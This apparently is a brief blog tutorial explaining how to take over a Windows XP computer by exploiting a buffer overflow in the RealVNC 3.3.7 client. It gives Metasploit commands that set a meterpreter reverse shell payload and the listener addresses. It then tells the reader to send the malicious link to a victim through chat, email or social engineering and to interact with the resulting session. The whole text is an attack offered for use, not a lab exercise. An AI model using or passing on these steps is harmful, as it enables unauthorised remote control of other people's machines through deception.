How to Attacking on Remote PC Using Real VNC

Real VNC 3.3.7 Client Buffer Overflow

This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).

Exploit Targets

Real VNC 3.3.7

Internet Explorer 7 on XP SP2

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/vnc/realvnc_client

Msf exploit (realvnc_client)>set payload windows/meterpreter/reverse_tcp

Msf exploit (realvnc_client)>set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (realvnc_client)>set srvhost 192.168.1.2 (This must be an address on the local machine)

Msf exploit (realvnc_client)>exploit

Now an URL you should give to your victim //192.168.1.2:4444

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

 

Leave a Reply

Your email address will not be published. Required fields are marked *